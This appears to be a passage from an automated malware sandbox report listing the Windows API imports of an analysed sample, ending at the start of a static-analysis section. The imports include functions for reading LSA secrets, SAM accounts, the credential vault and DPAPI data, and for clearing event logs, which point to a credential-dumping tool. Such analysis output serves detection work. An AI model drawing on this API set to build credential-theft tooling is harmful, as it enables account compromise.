1841. "kernel32.dll.VirtualProtect",
1842. "kernel32.dll.CreateMutexW",
1843. "kernel32.dll.HeapCompact",
1844. "kernel32.dll.TryEnterCriticalSection",
1845. "kernel32.dll.QueryPerformanceCounter",
1846. "kernel32.dll.FlushViewOfFile",
1847. "kernel32.dll.WaitForSingleObjectEx",
1848. "kernel32.dll.OutputDebugStringW",
1849. "kernel32.dll.UnlockFileEx",
1850. "kernel32.dll.FormatMessageA",
1851. "kernel32.dll.FormatMessageW",
1852. "kernel32.dll.GetVersionExW",
1853. "kernel32.dll.HeapValidate",
1854. "kernel32.dll.GetTempPathW",
1855. "kernel32.dll.LockFileEx",
1856. "kernel32.dll.GetDiskFreeSpaceW",
1857. "kernel32.dll.CreateFileMappingA",
1858. "kernel32.dll.GetDiskFreeSpaceA",
1859. "kernel32.dll.GetFileAttributesExW",
1860. "kernel32.dll.OutputDebugStringA",
1861. "kernel32.dll.DeleteFileW",
1862. "kernel32.dll.GetCurrentProcessId",
1863. "kernel32.dll.AreFileApisANSI",
1864. "kernel32.dll.SetConsoleCtrlHandler",
1865. "kernel32.dll.SetConsoleTitleW",
1866. "kernel32.dll.LoadLibraryW",
1867. "kernel32.dll.GetModuleHandleW",
1868. "kernel32.dll.SetHandleInformation",
1869. "kernel32.dll.CreatePipe",
1870. "kernel32.dll.CreateEventW",
1871. "kernel32.dll.RtlLookupFunctionEntry",
1872. "kernel32.dll.RtlCaptureContext",
1873. "kernel32.dll.GetSystemDirectoryW",
1874. "kernel32.dll.SetConsoleCursorPosition",
1875. "kernel32.dll.FillConsoleOutputCharacterW",
1876. "kernel32.dll.GetComputerNameW",
1877. "kernel32.dll.ProcessIdToSessionId",
1878. "kernel32.dll.SetCurrentDirectoryW",
1879. "kernel32.dll.GetConsoleScreenBufferInfo",
1880. "advapi32.dll.CryptSetHashParam",
1881. "advapi32.dll.CryptExportKey",
1882. "advapi32.dll.CryptAcquireContextW",
1883. "advapi32.dll.CryptSetKeyParam",
1884. "advapi32.dll.CryptGetKeyParam",
1885. "advapi32.dll.CryptDuplicateKey",
1886. "advapi32.dll.CryptGetProvParam",
1887. "advapi32.dll.CryptImportKey",
1888. "advapi32.dll.SystemFunction007",
1889. "advapi32.dll.CryptEncrypt",
1890. "advapi32.dll.CryptGenKey",
1891. "advapi32.dll.CryptDestroyKey",
1892. "advapi32.dll.CryptDecrypt",
1893. "advapi32.dll.CopySid",
1894. "advapi32.dll.GetLengthSid",
1895. "advapi32.dll.LsaQueryInformationPolicy",
1896. "advapi32.dll.LsaOpenPolicy",
1897. "advapi32.dll.LsaClose",
1898. "advapi32.dll.CreateWellKnownSid",
1899. "advapi32.dll.CreateProcessWithLogonW",
1900. "advapi32.dll.CreateProcessAsUserW",
1901. "advapi32.dll.RegQueryValueExW",
1902. "advapi32.dll.RegEnumValueW",
1903. "advapi32.dll.RegSetValueExW",
1904. "advapi32.dll.SystemFunction032",
1905. "advapi32.dll.ConvertSidToStringSidW",
1906. "advapi32.dll.CreateServiceW",
1907. "advapi32.dll.OpenSCManagerW",
1908. "advapi32.dll.SetServiceObjectSecurity",
1909. "advapi32.dll.OpenServiceW",
1910. "advapi32.dll.BuildSecurityDescriptorW",
1911. "advapi32.dll.QueryServiceObjectSecurity",
1912. "advapi32.dll.StartServiceW",
1913. "advapi32.dll.AllocateAndInitializeSid",
1914. "advapi32.dll.QueryServiceStatusEx",
1915. "advapi32.dll.FreeSid",
1916. "advapi32.dll.ControlService",
1917. "advapi32.dll.IsTextUnicode",
1918. "advapi32.dll.OpenProcessToken",
1919. "advapi32.dll.GetTokenInformation",
1920. "advapi32.dll.LookupAccountNameW",
1921. "advapi32.dll.DuplicateTokenEx",
1922. "advapi32.dll.CheckTokenMembership",
1923. "advapi32.dll.CryptEnumProvidersW",
1924. "advapi32.dll.ConvertStringSidToSidW",
1925. "advapi32.dll.LsaFreeMemory",
1926. "advapi32.dll.SetThreadToken",
1927. "advapi32.dll.CryptSetProvParam",
1928. "advapi32.dll.CryptEnumProviderTypesW",
1929. "advapi32.dll.SystemFunction006",
1930. "advapi32.dll.CryptGetUserKey",
1931. "advapi32.dll.OpenEventLogW",
1932. "advapi32.dll.GetNumberOfEventLogRecords",
1933. "advapi32.dll.ClearEventLogW",
1934. "advapi32.dll.SystemFunction001",
1935. "advapi32.dll.CryptDeriveKey",
1936. "advapi32.dll.SystemFunction005",
1937. "advapi32.dll.LsaQueryTrustedDomainInfoByName",
1938. "advapi32.dll.CryptSignHashW",
1939. "advapi32.dll.LsaOpenSecret",
1940. "advapi32.dll.LsaQuerySecret",
1941. "advapi32.dll.SystemFunction013",
1942. "advapi32.dll.LsaRetrievePrivateData",
1943. "advapi32.dll.LsaEnumerateTrustedDomainsEx",
1944. "advapi32.dll.LookupPrivilegeValueW",
1945. "advapi32.dll.StartServiceCtrlDispatcherW",
1946. "advapi32.dll.RegisterServiceCtrlHandlerW",
1947. "advapi32.dll.IsValidSid",
1948. "advapi32.dll.LookupPrivilegeNameW",
1949. "advapi32.dll.OpenThreadToken",
1950. "advapi32.dll.CredFree",
1951. "advapi32.dll.CredEnumerateW",
1952. "advapi32.dll.GetSidSubAuthority",
1953. "advapi32.dll.GetSidSubAuthorityCount",
1954. "advapi32.dll.SystemFunction025",
1955. "advapi32.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
1956. "advapi32.dll.SystemFunction024",
1957. "advapi32.dll.A_SHAFinal",
1958. "advapi32.dll.A_SHAInit",
1959. "advapi32.dll.A_SHAUpdate",
1960. "cabinet.dll.#11",
1961. "cabinet.dll.#14",
1962. "cabinet.dll.#10",
1963. "cabinet.dll.#13",
1964. "crypt32.dll.CertGetNameStringW",
1965. "crypt32.dll.CryptEncodeObject",
1966. "crypt32.dll.CertEnumSystemStore",
1967. "crypt32.dll.CryptSignAndEncodeCertificate",
1968. "crypt32.dll.CertEnumCertificatesInStore",
1969. "crypt32.dll.CertAddEncodedCertificateToStore",
1970. "crypt32.dll.CertOpenStore",
1971. "crypt32.dll.CertFreeCertificateContext",
1972. "crypt32.dll.CertCloseStore",
1973. "crypt32.dll.CertSetCertificateContextProperty",
1974. "crypt32.dll.PFXExportCertStoreEx",
1975. "crypt32.dll.CryptUnprotectData",
1976. "crypt32.dll.CryptBinaryToStringW",
1977. "crypt32.dll.CryptStringToBinaryW",
1978. "crypt32.dll.CryptProtectData",
1979. "crypt32.dll.CryptExportPublicKeyInfo",
1980. "crypt32.dll.CryptAcquireCertificatePrivateKey",
1981. "crypt32.dll.CertNameToStrW",
1982. "crypt32.dll.CertGetCertificateContextProperty",
1983. "crypt32.dll.CertAddCertificateContextToStore",
1984. "crypt32.dll.CertFindCertificateInStore",
1985. "cryptdll.dll.CDLocateCSystem",
1986. "cryptdll.dll.MD5Final",
1987. "cryptdll.dll.MD5Init",
1988. "cryptdll.dll.CDLocateCheckSum",
1989. "cryptdll.dll.CDGenerateRandomBits",
1990. "cryptdll.dll.MD5Update",
1991. "fltlib.dll.FilterFindFirst",
1992. "fltlib.dll.FilterFindNext",
1993. "hid.dll.HidD_GetPreparsedData",
1994. "hid.dll.HidD_FreePreparsedData",
1995. "hid.dll.HidP_GetCaps",
1996. "hid.dll.HidD_GetFeature",
1997. "hid.dll.HidD_GetAttributes",
1998. "hid.dll.HidD_GetHidGuid",
1999. "hid.dll.HidD_SetFeature",
2000. "msasn1.dll.ASN1_CreateModule",
2001. "msasn1.dll.ASN1_CloseEncoder",
2002. "msasn1.dll.ASN1_CreateDecoder",
2003. "msasn1.dll.ASN1_FreeEncoded",
2004. "msasn1.dll.ASN1_CloseModule",
2005. "msasn1.dll.ASN1_CreateEncoder",
2006. "msasn1.dll.ASN1_CloseDecoder",
2007. "msasn1.dll.ASN1BERDotVal2Eoid",
2008. "msvcrt.dll.isdigit",
2009. "msvcrt.dll.isspace",
2010. "msvcrt.dll.__set_app_type",
2011. "msvcrt.dll.mbtowc",
2012. "msvcrt.dll.__mb_cur_max",
2013. "msvcrt.dll.isleadbyte",
2014. "msvcrt.dll.isxdigit",
2015. "msvcrt.dll.localeconv",
2016. "msvcrt.dll._snprintf",
2017. "msvcrt.dll._itoa",
2018. "msvcrt.dll.calloc",
2019. "msvcrt.dll.wctomb",
2020. "msvcrt.dll.ferror",
2021. "msvcrt.dll.iswctype",
2022. "msvcrt.dll.wcstombs",
2023. "msvcrt.dll.?terminate@@YAXXZ",
2024. "msvcrt.dll.__badioinfo",
2025. "msvcrt.dll.__pioinfo",
2026. "msvcrt.dll._read",
2027. "msvcrt.dll._lseeki64",
2028. "msvcrt.dll._write",
2029. "msvcrt.dll._isatty",
2030. "msvcrt.dll.ungetc",
2031. "msvcrt.dll._fmode",
2032. "msvcrt.dll.getchar",
2033. "msvcrt.dll._wpgmptr",
2034. "msvcrt.dll._commode",
2035. "msvcrt.dll.__setusermatherr",
2036. "msvcrt.dll._amsg_exit",
2037. "msvcrt.dll._initterm",
2038. "msvcrt.dll.exit",
2039. "msvcrt.dll._cexit",
2040. "msvcrt.dll._exit",
2041. "msvcrt.dll._XcptFilter",
2042. "msvcrt.dll.__wgetmainargs",
2043. "msvcrt.dll.__C_specific_handler",
2044. "msvcrt.dll.fgetws",
2045. "msvcrt.dll.memset",
2046. "msvcrt.dll.memcpy",
2047. "msvcrt.dll._errno",
2048. "msvcrt.dll.free",
2049. "msvcrt.dll._wcsdup",
2050. "msvcrt.dll.vfwprintf",
2051. "msvcrt.dll.fflush",
2052. "msvcrt.dll._wfopen",
2053. "msvcrt.dll.wprintf",
2054. "msvcrt.dll._fileno",
2055. "msvcrt.dll._iob",
2056. "msvcrt.dll.vwprintf",
2057. "msvcrt.dll._setmode",
2058. "msvcrt.dll.fclose",
2059. "msvcrt.dll.gmtime",
2060. "msvcrt.dll.malloc",
2061. "msvcrt.dll._msize",
2062. "msvcrt.dll.strftime",
2063. "msvcrt.dll.realloc",
2064. "netapi32.dll.NetServerGetInfo",
2065. "netapi32.dll.NetStatisticsGet",
2066. "netapi32.dll.NetShareEnum",
2067. "netapi32.dll.NetSessionEnum",
2068. "netapi32.dll.DsGetDcNameW",
2069. "netapi32.dll.NetApiBufferFree",
2070. "netapi32.dll.NetRemoteTOD",
2071. "netapi32.dll.NetWkstaUserEnum",
2072. "netapi32.dll.I_NetServerTrustPasswordsGet",
2073. "netapi32.dll.I_NetServerReqChallenge",
2074. "netapi32.dll.I_NetServerAuthenticate2",
2075. "ntdll.dll.wcsncmp",
2076. "ntdll.dll._wcstoui64",
2077. "ntdll.dll.wcstol",
2078. "ntdll.dll.wcstoul",
2079. "ntdll.dll.memmove",
2080. "ntdll.dll.wcsstr",
2081. "ntdll.dll._wcsnicmp",
2082. "ntdll.dll.strtoul",
2083. "ntdll.dll.wcschr",
2084. "ntdll.dll.wcsrchr",
2085. "ntdll.dll._stricmp",
2086. "ntdll.dll._vscwprintf",
2087. "ntdll.dll._wcsicmp",
2088. "ntdll.dll.strrchr",
2089. "ntdll.dll._vsnprintf",
2090. "ntdll.dll.memcmp",
2091. "ntdll.dll.RtlUnicodeStringToAnsiString",
2092. "ntdll.dll.RtlFreeAnsiString",
2093. "ntdll.dll.RtlDowncaseUnicodeString",
2094. "ntdll.dll.RtlFreeUnicodeString",
2095. "ntdll.dll.RtlInitUnicodeString",
2096. "ntdll.dll.RtlEqualUnicodeString",
2097. "ntdll.dll.NtQueryObject",
2098. "ntdll.dll.RtlCompressBuffer",
2099. "ntdll.dll.RtlGetCompressionWorkSpaceSize",
2100. "ntdll.dll.NtQuerySystemInformation",
2101. "ntdll.dll.RtlGetCurrentPeb",
2102. "ntdll.dll.NtQueryInformationProcess",
2103. "ntdll.dll.RtlCreateUserThread",
2104. "ntdll.dll.RtlGUIDFromString",
2105. "ntdll.dll.RtlStringFromGUID",
2106. "ntdll.dll.NtCompareTokens",
2107. "ntdll.dll.RtlGetNtVersionNumbers",
2108. "ntdll.dll.RtlEqualString",
2109. "ntdll.dll.RtlUpcaseUnicodeString",
2110. "ntdll.dll.RtlAppendUnicodeStringToString",
2111. "ntdll.dll.RtlAnsiStringToUnicodeString",
2112. "ntdll.dll.RtlFreeOemString",
2113. "ntdll.dll.RtlUpcaseUnicodeStringToOemString",
2114. "ntdll.dll.NtResumeProcess",
2115. "ntdll.dll.NtSuspendProcess",
2116. "ntdll.dll.NtTerminateProcess",
2117. "ntdll.dll.NtQuerySystemEnvironmentValueEx",
2118. "ntdll.dll.NtSetSystemEnvironmentValueEx",
2119. "ntdll.dll.NtEnumerateSystemEnvironmentValuesEx",
2120. "ntdll.dll.RtlIpv4AddressToStringW",
2121. "ntdll.dll.RtlIpv6AddressToStringW",
2122. "ntdll.dll.towupper",
2123. "ntdll.dll.__chkstk",
2124. "rpcrt4.dll.RpcMgmtEpEltInqNextW",
2125. "rpcrt4.dll.RpcMgmtEpEltInqBegin",
2126. "rpcrt4.dll.I_RpcGetCurrentCallHandle",
2127. "rpcrt4.dll.NdrClientCall2",
2128. "rpcrt4.dll.RpcMgmtEpEltInqDone",
2129. "rpcrt4.dll.RpcBindingFromStringBindingW",
2130. "rpcrt4.dll.RpcStringBindingComposeW",
2131. "rpcrt4.dll.MesEncodeIncrementalHandleCreate",
2132. "rpcrt4.dll.RpcBindingSetAuthInfoExW",
2133. "rpcrt4.dll.RpcBindingInqAuthClientW",
2134. "rpcrt4.dll.RpcBindingSetOption",
2135. "rpcrt4.dll.RpcImpersonateClient",
2136. "rpcrt4.dll.RpcStringFreeW",
2137. "rpcrt4.dll.RpcRevertToSelf",
2138. "rpcrt4.dll.MesDecodeIncrementalHandleCreate",
2139. "rpcrt4.dll.MesHandleFree",
2140. "rpcrt4.dll.MesIncrementalHandleReset",
2141. "rpcrt4.dll.NdrMesTypeDecode2",
2142. "rpcrt4.dll.NdrMesTypeAlignSize2",
2143. "rpcrt4.dll.NdrMesTypeFree2",
2144. "rpcrt4.dll.NdrMesTypeEncode2",
2145. "rpcrt4.dll.RpcServerUnregisterIfEx",
2146. "rpcrt4.dll.I_RpcBindingInqSecurityContext",
2147. "rpcrt4.dll.RpcServerInqBindings",
2148. "rpcrt4.dll.RpcServerListen",
2149. "rpcrt4.dll.RpcMgmtWaitServerListen",
2150. "rpcrt4.dll.RpcEpRegisterW",
2151. "rpcrt4.dll.RpcMgmtStopServerListening",
2152. "rpcrt4.dll.RpcBindingToStringBindingW",
2153. "rpcrt4.dll.RpcServerRegisterIf2",
2154. "rpcrt4.dll.RpcServerRegisterAuthInfoW",
2155. "rpcrt4.dll.RpcBindingVectorFree",
2156. "rpcrt4.dll.UuidToStringW",
2157. "rpcrt4.dll.RpcServerUseProtseqEpW",
2158. "rpcrt4.dll.RpcEpUnregister",
2159. "rpcrt4.dll.NdrServerCall2",
2160. "rpcrt4.dll.RpcEpResolveBinding",
2161. "rpcrt4.dll.UuidCreate",
2162. "samlib.dll.SamGetGroupsForUser",
2163. "samlib.dll.SamEnumerateGroupsInDomain",
2164. "samlib.dll.SamiChangePasswordUser",
2165. "samlib.dll.SamGetMembersInGroup",
2166. "samlib.dll.SamSetInformationUser",
2167. "samlib.dll.SamRidToSid",
2168. "samlib.dll.SamGetMembersInAlias",
2169. "samlib.dll.SamEnumerateAliasesInDomain",
2170. "samlib.dll.SamGetAliasMembership",
2171. "samlib.dll.SamOpenGroup",
2172. "samlib.dll.SamOpenAlias",
2173. "samlib.dll.SamQueryInformationUser",
2174. "samlib.dll.SamCloseHandle",
2175. "samlib.dll.SamEnumerateDomainsInSamServer",
2176. "samlib.dll.SamFreeMemory",
2177. "samlib.dll.SamEnumerateUsersInDomain",
2178. "samlib.dll.SamOpenUser",
2179. "samlib.dll.SamLookupDomainInSamServer",
2180. "samlib.dll.SamLookupNamesInDomain",
2181. "samlib.dll.SamLookupIdsInDomain",
2182. "samlib.dll.SamOpenDomain",
2183. "samlib.dll.SamConnect",
2184. "secur32.dll.FreeContextBuffer",
2185. "secur32.dll.LsaLookupAuthenticationPackage",
2186. "secur32.dll.LsaConnectUntrusted",
2187. "secur32.dll.LsaFreeReturnBuffer",
2188. "secur32.dll.LsaDeregisterLogonProcess",
2189. "secur32.dll.DeleteSecurityContext",
2190. "secur32.dll.LsaCallAuthenticationPackage",
2191. "secur32.dll.FreeCredentialsHandle",
2192. "secur32.dll.AcquireCredentialsHandleW",
2193. "secur32.dll.InitializeSecurityContextW",
2194. "secur32.dll.QueryContextAttributesW",
2195. "secur32.dll.EnumerateSecurityPackagesW",
2196. "setupapi.dll.SetupDiGetDeviceInterfaceDetailW",
2197. "setupapi.dll.SetupDiEnumDeviceInterfaces",
2198. "setupapi.dll.SetupDiGetClassDevsW",
2199. "setupapi.dll.SetupDiDestroyDeviceInfoList",
2200. "shell32.dll.CommandLineToArgvW",
2201. "shlwapi.dll.PathIsDirectoryW",
2202. "shlwapi.dll.PathCanonicalizeW",
2203. "shlwapi.dll.PathCombineW",
2204. "shlwapi.dll.PathFindFileNameW",
2205. "shlwapi.dll.PathIsRelativeW",
2206. "user32.dll.IsCharAlphaNumericW",
2207. "user32.dll.GetKeyboardLayout",
2208. "user32.dll.DispatchMessageW",
2209. "user32.dll.DefWindowProcW",
2210. "user32.dll.SetClipboardViewer",
2211. "user32.dll.SendMessageW",
2212. "user32.dll.GetClipboardSequenceNumber",
2213. "user32.dll.CreateWindowExW",
2214. "user32.dll.ChangeClipboardChain",
2215. "user32.dll.RegisterClassExW",
2216. "user32.dll.EnumClipboardFormats",
2217. "user32.dll.PostMessageW",
2218. "user32.dll.UnregisterClassW",
2219. "user32.dll.GetMessageW",
2220. "userenv.dll.CreateEnvironmentBlock",
2221. "userenv.dll.DestroyEnvironmentBlock",
2222. "version.dll.GetFileVersionInfoSizeW",
2223. "version.dll.VerQueryValueW",
2224. "version.dll.GetFileVersionInfoW",
2225. "winscard.dll.SCardFreeMemory",
2226. "winscard.dll.SCardListCardsW",
2227. "winscard.dll.SCardControl",
2228. "winscard.dll.SCardGetCardTypeProviderNameW",
2229. "winscard.dll.SCardReleaseContext",
2230. "winscard.dll.SCardListReadersW",
2231. "winscard.dll.SCardEstablishContext",
2232. "winscard.dll.SCardConnectW",
2233. "winscard.dll.SCardTransmit",
2234. "winscard.dll.SCardDisconnect",
2235. "winscard.dll.SCardGetAttrib",
2236. "winsta.dll.WinStationCloseServer",
2237. "winsta.dll.WinStationOpenServerW",
2238. "winsta.dll.WinStationFreeMemory",
2239. "winsta.dll.WinStationConnectW",
2240. "winsta.dll.WinStationQueryInformationW",
2241. "winsta.dll.WinStationEnumerateW",
2242. "wldap32.dll.#140",
2243. "wldap32.dll.#122",
2244. "wldap32.dll.#14",
2245. "wldap32.dll.#88",
2246. "wldap32.dll.#133",
2247. "wldap32.dll.#142",
2248. "wldap32.dll.#77",
2249. "wldap32.dll.#27",
2250. "wldap32.dll.#13",
2251. "wldap32.dll.#147",
2252. "wldap32.dll.#96",
2253. "wldap32.dll.#208",
2254. "wldap32.dll.#224",
2255. "wldap32.dll.#36",
2256. "wldap32.dll.#79",
2257. "wldap32.dll.#157",
2258. "wldap32.dll.#26",
2259. "wldap32.dll.#41",
2260. "wldap32.dll.#127",
2261. "wldap32.dll.#73",
2262. "wldap32.dll.#301",
2263. "wldap32.dll.#304",
2264. "wldap32.dll.#309",
2265. "wldap32.dll.#54",
2266. "wldap32.dll.#310",
2267. "wldap32.dll.#69",
2268. "wldap32.dll.#139",
2269. "wldap32.dll.#97",
2270. "wldap32.dll.#223",
2271. "wldap32.dll.#12",
2272. "wldap32.dll.#145",
2273. "wldap32.dll.#113",
2274. "wldap32.dll.#167",
2275. "wldap32.dll.#203",
2276. "rsaenh.dll.CPExportKey",
2277. "vaultcli.dll.VaultEnumerateItemTypes",
2278. "vaultcli.dll.VaultEnumerateVaults",
2279. "vaultcli.dll.VaultOpenVault",
2280. "vaultcli.dll.VaultGetInformation",
2281. "vaultcli.dll.VaultEnumerateItems",
2282. "vaultcli.dll.VaultCloseVault",
2283. "vaultcli.dll.VaultFree",
2284. "vaultcli.dll.VaultGetItem",
2285. "wintrust.dll.WinVerifyTrust",
2286. "bcrypt.dll.BCryptOpenAlgorithmProvider",
2287. "bcrypt.dll.BCryptSetProperty",
2288. "bcrypt.dll.BCryptGetProperty",
2289. "bcrypt.dll.BCryptGenerateSymmetricKey",
2290. "bcrypt.dll.BCryptDecrypt",
2291. "cryptsp.dll.CryptImportKey",
2292. "cryptsp.dll.CryptSetHashParam",
2293. "cryptsp.dll.CryptDestroyKey",
2294. "bcrypt.dll.BCryptCloseAlgorithmProvider",
2295. "bcrypt.dll.BCryptDestroyKey",
2296. "sspicli.dll.GetUserNameExW",
2297. "advapi32.dll.GetUserNameW",
2298. "sechost.dll.ConvertSidToStringSidW",
2299. "xmllite.dll.CreateXmlWriter",
2300. "xmllite.dll.CreateXmlWriterOutputWithEncodingName",
2301. "sechost.dll.ChangeServiceConfigW",
2302. "kernel32.dll.GetThreadContext",
2303. "kernel32.dll.OpenThread",
2304. "kernel32.dll.DebugActiveProcess",
2305. "kernel32.dll.DebugActiveProcessStop",
2306. "kernel32.dll.ContinueDebugEvent",
2307. "kernel32.dll.WaitForDebugEvent",
2308. "kernel32.dll.SystemTimeToTzSpecificLocalTime",
2309. "kernel32.dll.Process32FirstW",
2310. "kernel32.dll.Process32NextW",
2311. "kernel32.dll.DebugBreak",
2312. "kernel32.dll.SetFilePointerEx",
2313. "kernel32.dll.CreateSemaphoreW",
2314. "kernel32.dll.GetConsoleCP",
2315. "kernel32.dll.LoadLibraryExW",
2316. "kernel32.dll.GetStartupInfoW",
2317. "kernel32.dll.InitializeCriticalSectionAndSpinCount",
2318. "kernel32.dll.GetModuleFileNameW",
2319. "kernel32.dll.GetCommandLineW",
2320. "kernel32.dll.WriteConsoleW",
2321. "kernel32.dll.ReadConsoleW",
2322. "kernel32.dll.IsValidCodePage",
2323. "kernel32.dll.GetConsoleMode",
2324. "kernel32.dll.ReadConsoleInputA",
2325. "kernel32.dll.SetConsoleMode",
2326. "kernel32.dll.GetModuleHandleExW",
2327. "kernel32.dll.RtlPcToFileHeader",
2328. "kernel32.dll.RtlUnwindEx",
2329. "advapi32.dll.EnumServicesStatusExW",
2330. "advapi32.dll.AdjustTokenPrivileges",
2331. "advapi32.dll.RegDeleteValueW",
2332. "advapi32.dll.RegDeleteKeyW",
2333. "advapi32.dll.RegCreateKeyW",
2334. "comdlg32.dll.PrintDlgW",
2335. "gdi32.dll.StartDocW",
2336. "ole32.dll.CoAllowSetForegroundWindow",
2337. "pdh.dll.PdhOpenQueryW",
2338. "pdh.dll.PdhAddCounterW",
2339. "pdh.dll.PdhCollectQueryData",
2340. "pdh.dll.PdhGetFormattedCounterValue",
2341. "psapi.dll.EnumProcessModules",
2342. "psapi.dll.GetProcessImageFileNameW",
2343. "psapi.dll.GetModuleBaseNameW",
2344. "user32.dll.SetWindowTextW",
2345. "user32.dll.wsprintfW",
2346. "user32.dll.IsHungAppWindow",
2347. "user32.dll.EnumWindows",
2348. "user32.dll.DialogBoxIndirectParamW",
2349. "user32.dll.LoadCursorW",
2350. "kernel32.dll.InitializeCriticalSectionEx",
2351. "kernel32.dll.CreateEventExW",
2352. "kernel32.dll.CreateSemaphoreExW",
2353. "kernel32.dll.SetThreadStackGuarantee",
2354. "kernel32.dll.CreateThreadpoolTimer",
2355. "kernel32.dll.SetThreadpoolTimer",
2356. "kernel32.dll.WaitForThreadpoolTimerCallbacks",
2357. "kernel32.dll.CloseThreadpoolTimer",
2358. "kernel32.dll.CreateThreadpoolWait",
2359. "kernel32.dll.SetThreadpoolWait",
2360. "kernel32.dll.CloseThreadpoolWait",
2361. "kernel32.dll.FlushProcessWriteBuffers",
2362. "kernel32.dll.FreeLibraryWhenCallbackReturns",
2363. "kernel32.dll.GetCurrentProcessorNumber",
2364. "kernel32.dll.GetLogicalProcessorInformation",
2365. "kernel32.dll.CreateSymbolicLinkW",
2366. "kernel32.dll.EnumSystemLocalesEx",
2367. "kernel32.dll.CompareStringEx",
2368. "kernel32.dll.GetDateFormatEx",
2369. "kernel32.dll.GetLocaleInfoEx",
2370. "kernel32.dll.GetTimeFormatEx",
2371. "kernel32.dll.GetUserDefaultLocaleName",
2372. "kernel32.dll.IsValidLocaleName",
2373. "kernel32.dll.LCMapStringEx",
2374. "kernel32.dll.GetTickCount64",
2375. "dbghelp.dll.MiniDumpWriteDump",
2376. "dbghelp.dll.ImagehlpApiVersion",
2377. "dbghelp.dll.EnumerateLoadedModulesEx",
2378. "ntdll.dll.RtlCreateProcessReflection",
2379. "ntdll.dll.RtlGetLastNtStatus",
2380. "kernel32.dll.K32GetModuleFileNameExW",
2381. "kernel32.dll.Thread32First",
2382. "kernel32.dll.Thread32Next",
2383. "kernel32.dll.Module32First",
2384. "kernel32.dll.Module32Next",
2385. "kernel32.dll.Module32FirstW",
2386. "kernel32.dll.Module32NextW",
2387. "kernel32.dll.GetLongPathNameA",
2388. "kernel32.dll.GetLongPathNameW",
2389. "kernel32.dll.GetProcessTimes",
2390. "ntdll.dll.NtOpenThread",
2391. "ntdll.dll.NtQueryInformationThread",
2392. "ntdll.dll.NtQueryMutant",
2393. "ntdll.dll.NtSystemDebugControl",
2394. "ntdll.dll.RtlFreeHeap",
2395. "ntdll.dll.RtlGetFunctionTableListHead",
2396. "ntdll.dll.RtlGetUnloadEventTrace",
2397. "ntdll.dll.RtlGetUnloadEventTraceEx",
2398. "ntdll.dll.NtOpenProcessToken",
2399. "ntdll.dll.NtOpenThreadToken",
2400. "ntdll.dll.NtQueryInformationToken",
2401. "ntdll.dll.NtClose",
2402. "powrprof.dll.CallNtPowerInformation",
2403. "kernel32.dll.ExitThread",
2404. "kernel32.dll.SetFileAttributesW",
2405. "kernel32.dll.FreeConsole",
2406. "kernel32.dll.GetConsoleWindow",
2407. "kernel32.dll.SetThreadAffinityMask",
2408. "kernel32.dll.SetThreadPriority",
2409. "kernel32.dll.FlushInstructionCache",
2410. "kernel32.dll.PostQueuedCompletionStatus",
2411. "kernel32.dll.GetQueuedCompletionStatusEx",
2412. "kernel32.dll.CreateIoCompletionPort",
2413. "kernel32.dll.SetConsoleTextAttribute",
2414. "kernel32.dll.RegisterWaitForSingleObject",
2415. "kernel32.dll.UnregisterWait",
2416. "kernel32.dll.GetConsoleCursorInfo",
2417. "kernel32.dll.QueueUserWorkItem",
2418. "kernel32.dll.SetConsoleCursorInfo",
2419. "kernel32.dll.ReadConsoleInputW",
2420. "kernel32.dll.WriteConsoleInputW",
2421. "kernel32.dll.FillConsoleOutputAttribute",
2422. "kernel32.dll.GetNumberOfConsoleInputEvents",
2423. "kernel32.dll.GetShortPathNameW",
2424. "kernel32.dll.ReadDirectoryChangesW",
2425. "kernel32.dll.QueryPerformanceFrequency",
2426. "kernel32.dll.IsValidLocale",
2427. "kernel32.dll.CreateDirectoryW",
2428. "kernel32.dll.RemoveDirectoryW",
2429. "kernel32.dll.GetFinalPathNameByHandleW",
2430. "kernel32.dll.SetFileTime",
2431. "kernel32.dll.ReOpenFile",
2432. "kernel32.dll.CreateHardLinkW",
2433. "kernel32.dll.MoveFileExW",
2434. "kernel32.dll.CopyFileW",
2435. "kernel32.dll.SleepConditionVariableCS",
2436. "kernel32.dll.WakeConditionVariable",
2437. "kernel32.dll.InitializeConditionVariable",
2438. "kernel32.dll.CancelIo",
2439. "kernel32.dll.SetFileCompletionNotificationModes",
2440. "kernel32.dll.SetNamedPipeHandleState",
2441. "kernel32.dll.CreateNamedPipeW",
2442. "kernel32.dll.PeekNamedPipe",
2443. "kernel32.dll.CancelSynchronousIo",
2444. "kernel32.dll.GetNamedPipeHandleStateA",
2445. "kernel32.dll.CancelIoEx",
2446. "kernel32.dll.SwitchToThread",
2447. "kernel32.dll.ConnectNamedPipe",
2448. "kernel32.dll.UnregisterWaitEx",
2449. "kernel32.dll.GetExitCodeProcess",
2450. "kernel32.dll.EnumSystemLocalesW",
2451. "kernel32.dll.FindFirstFileExA",
2452. "kernel32.dll.GetLocaleInfoW",
2453. "kernel32.dll.ResetEvent",
2454. "kernel32.dll.InitializeSListHead",
2455. "kernel32.dll.GetThreadTimes",
2456. "kernel32.dll.FreeLibraryAndExitThread",
2457. "advapi32.dll.CryptGenRandom",
2458. "advapi32.dll.LsaAddAccountRights",
2459. "user32.dll.MapVirtualKeyW",
2460. "ws2_32.dll.#112",
2461. "ws2_32.dll.WSARecvFrom",
2462. "ws2_32.dll.#22",
2463. "ws2_32.dll.#7",
2464. "ws2_32.dll.#111",
2465. "kernel32.dll.InitOnceExecuteOnce",
2466. "kernel32.dll.GetFileInformationByHandleEx",
2467. "kernel32.dll.SetFileInformationByHandle",
2468. "kernel32.dll.WakeAllConditionVariable",
2469. "kernel32.dll.InitializeSRWLock",
2470. "kernel32.dll.AcquireSRWLockExclusive",
2471. "kernel32.dll.TryAcquireSRWLockExclusive",
2472. "kernel32.dll.ReleaseSRWLockExclusive",
2473. "kernel32.dll.SleepConditionVariableSRW",
2474. "kernel32.dll.CreateThreadpoolWork",
2475. "kernel32.dll.SubmitThreadpoolWork",
2476. "kernel32.dll.CloseThreadpoolWork",
2477. "ntdll.dll.RtlGetVersion",
2478. "ntdll.dll.RtlNtStatusToDosError",
2479. "ntdll.dll.NtDeviceIoControlFile",
2480. "ntdll.dll.NtQueryInformationFile",
2481. "ntdll.dll.NtSetInformationFile",
2482. "ntdll.dll.NtQueryVolumeInformationFile",
2483. "ntdll.dll.NtQueryDirectoryFile",
2484. "user32.dll.SetWinEventHook",
2485. "wersvc.dll.ServiceMain",
2486. "wersvc.dll.SvchostPushServiceGlobals"
2487. ]
2488.  
2489. [*] Static Analysis: {
2490. "pe": {
2491. "peid_signatures": null,
2492. "imports": [
2493. {
2494. "imports": [
